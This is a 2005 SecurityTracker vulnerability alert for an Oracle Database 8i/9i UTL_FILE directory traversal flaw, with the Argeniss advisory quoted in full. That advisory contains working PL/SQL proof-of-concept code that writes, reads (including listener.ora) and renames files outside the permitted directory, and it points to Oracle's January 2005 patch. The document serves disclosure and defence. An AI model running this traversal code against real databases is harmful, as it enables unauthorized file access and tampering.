Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Oracle Database Server UTL_FILE Error Discloses Files to Remote Authenticated Users
|
|
SecurityTracker Alert ID: 1013392 |
|
SecurityTracker URL: http://securitytracker.com/id/1013392
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 7 2005
|
Impact:
Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
|
Fix Available: Yes Vendor Confirmed: Yes
|
Version(s): 8i, 9i
|
Description:
An input validation vulnerability was reported in Oracle Database Server in the UTL_FILE package. A remote authenticated user can access arbitrary files on the target system.
The software does not properly validate user-supplied input in some Directory Object functions. A remote authenticated user can exploit a flaw in UTL_FILE by supplying directory traversal characters to some Directory Object functions to gain read or write access to files on the target system that are located outside of the intended directory.
The MEDIA_DIR function is affected. Other functions may also be affected.
The vendor was notified in October 2003.
|
Impact:
A remote authenticated user can gain read and write access to files on the target system.
|
Solution:
The vendor has issued a fix (Critical Patch Update - January 2005), described at:
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf
|
Vendor URL: www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), UNIX (Tru64), Windows (NT), Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 7 Mar 2005 14:00:37 -0800 (PST)
Subject: [VulnWatch] - Argeniss - Oracle Database Server Directory transversal
|
Argeniss Security Advisory
Name: Oracle Database Server Directory transversal
Affected Software: Oracle Database Server versions 8i
and 9i
Severity : Medium
Remote exploitable: Yes (Authentication to Database
Server is needed)
Credits: Cesar Cerrudo
Date: 03/07/05
Advisory Number: ARG030501
Details:
Oracle Database Server provides many packages
functions to access the OS file system, some of these
functions are not able to access files directly, for
example in order to access files a Directory Object
must be created and grant to users permissions on the
object, this object references a directory in the
file system and it can be used by functions to access
files under that directory only. However functions
don't properly validate the input and by supplying a
especially constructed string the directory can be
escaped and the parent directories can be accessed,
because of this any file in the same drive
as the directory, can be read, renamed, overwrited,
etc.
To reproduce the vulnerability execute the next
PL/SQL:
(In older Oracle database server versions the same
could work just using "\..\..\")
(This is not a extensive list of vulnerable functions,
other functions that parse files could
also be vulnerable)
--this create a file called Unbreakable.txt in the
same drive as the directory referenced by
--MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;
--this example can be used to read arbitrary files in
the same drive as the directory referenced by
--MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;
--this rename any file in the same drive as the
directory referenced by
--MEDIA_DIR directory object
begin
UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
end;
By default UTL_FILE package has execute permission to
public role so any Oracle database
user with permissions on a Directory Object can
exploit this vulnerability.
Explotation of this vulnerability allow an attacker to
overwrite, read, rename, etc.
arbitrary files.
Vendor Status:
Oracle was contacted on October 2003, after an initial
email interchange i didn't have any
news about when the vulnerability was going to be
patched or when it was patched nor i was credited,
but this is common when dealing with Oracle on
security issues.
Workaround:
Restrict access to Directory Objects and UTL_FILE
package.
Patch Available:
http://metalink.oracle.com
Links:
http://www.argeniss.com/research/ARGENISS-ADV-030501.txt
http://www.petefinnigan.com/directory_traversal.pdf
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf
Important!!!!!!!!
There are still hundreds of unpatched Oracle Database
Server vulnerabilities affecting
versions 8i, 9i and 10g some of them have been
reported more than 1 year ago.
If you want to know more about these vulnerabilities
and many others check out our
AVI (Advanced Vulnerability Information) service at
http://www.argeniss.com/services.html
-----------------------------------
--Argeniss - Information Security--
-----http://www.argeniss.com-------
------info>at<argeniss.com---------
-----------------------------------
__________________________________
Celebrate Yahoo!'s 10th Birthday!
Yahoo! Netrospective: 100 Moments of the Web
http://birthday.yahoo.com/netrospective/
|
|
Go to the Top of This SecurityTracker Archive Page
|
